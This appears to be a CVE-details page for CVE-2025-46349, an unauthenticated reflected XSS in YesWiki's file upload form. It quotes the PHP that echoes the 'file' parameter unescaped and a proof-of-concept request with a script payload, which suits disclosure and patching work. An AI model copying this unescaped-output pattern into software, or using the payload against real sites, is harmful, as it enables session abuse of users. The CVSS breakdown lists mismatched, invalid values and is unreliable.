What is CVE-2025-46349?

### Summary Reflected XSS has been detected in the file upload form. Vulnerability can be exploited without authentication This Proof of Concept has been performed using the followings: - YesWiki v4.5.3 (doryphore-dev branch) - Docker environnment (docker/docker-compose.yml) ### Vulnerable code The vulnerability is located in the [file](https://github.com/YesWiki/yeswiki/blob/6894234bbde6ab168bf4253f9a581bd24bf53766/tools/attach/libs/attach.lib.php#L724-L735) ``` public function showUploadForm() { $this->file = $_GET['file']; echo ' ' . _t('ATTACH_UPLOAD_FORM_FOR_FILE') . ' ' . $this->file . " \n"; echo ' wiki->href('upload', $this->wiki->GetPageTag()) . "\">\n" . ' wiki->GetPageTag() . "/upload\" />\n" . ' attachConfig['max_file_size'] . "\" />\n" . " file\" />\n" . " \n" . ' \n" . " \n"; } ``` ### PoC 1. You need to send a request to endpoint and abusing the `file` parameter, we can successfully obtain client side javascript execution ``` GET /?PagePrincipale/upload&file=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 Host: localhost:8085 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="135", "Not-A.Brand";v="8" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "macOS" Accept-Language: ru-RU,ru;q=0.9 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Connection: keep-alive ``` 2. Get a response ### Impact This vulnerability allows any malicious unauthenticated user to create a link that can be clicked on in the victim context to perform arbitrary actions

What is the severity of CVE-2025-46349?

CVE-2025-46349 has a CVSS v3 score of 6.1, which is classified as Medium severity.

Is there an exploit available for CVE-2025-46349?

Yes, there are known exploits available for CVE-2025-46349. Immediate patching is recommended.

Is there a patch available for CVE-2025-46349?

Yes, patches are available for CVE-2025-46349. Check the vendor advisories for update instructions.

CVE-2025-46349 - CVE Details, Severity, and Analysis

Severity Scores

CVSS v36.1

CVSS v20.0

Priority Score373.0

EPSS Score1.0

Medium

Exploitation LikelihoodLow

1.00%EPSS

Lower probability of exploitation

Patch during regular maintenance

1.00%

EPSS

6.1

CVSS

Yes

Exploit

Yes

Patch

Medium Priority

exploit exists

EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.

Description

Summary

Reflected XSS has been detected in the file upload form. Vulnerability can be exploited without authentication

This Proof of Concept has been performed using the followings:

YesWiki v4.5.3 (doryphore-dev branch)
Docker environnment (docker/docker-compose.yml)

Vulnerable code

The vulnerability is located in the file

        public function showUploadForm()
        {
            $this->file = $_GET['file'];
            echo '<h3>' . _t('ATTACH_UPLOAD_FORM_FOR_FILE') . ' ' . $this->file . "</h3>\n";
            echo '<form enctype="multipart/form-data" name="frmUpload" method="POST" action="' . $this->wiki->href('upload', $this->wiki->GetPageTag()) . "\">\n"
                . '	<input type="hidden" name="wiki" value="' . $this->wiki->GetPageTag() . "/upload\" />\n"
                . '	<input type="hidden" name="MAX_FILE_SIZE" value="' . $this->attachConfig['max_file_size'] . "\" />\n"
                . "	<input type=\"hidden\" name=\"file\" value=\"$this->file\" />\n"
                . "	<input type=\"file\" name=\"upFile\" size=\"50\" /><br />\n"
                . '	<input class="btn btn-primary" type="submit" value="' . _t('ATTACH_SAVE') . "\" />\n"
                . "</form>\n";
        }

PoC

You need to send a request to endpoint and abusing the file parameter, we can successfully obtain client side javascript execution

GET /?PagePrincipale/upload&file=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: localhost:8085
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="135", "Not-A.Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Accept-Language: ru-RU,ru;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

CVSS v3 Breakdown

Attack Vector:Network

Attack Complexity:Local

Privileges Required:Network

User Interaction:Required

Scope:Changed

Confidentiality:Local

Integrity:Local

Availability:Network

Exploit References

Nuclei

Patch References

Github.com Github.com Security [email protected]

Ready for Agentic Automated Testing?

CVE-2025-46349

Summary

Vulnerable code

PoC

Impact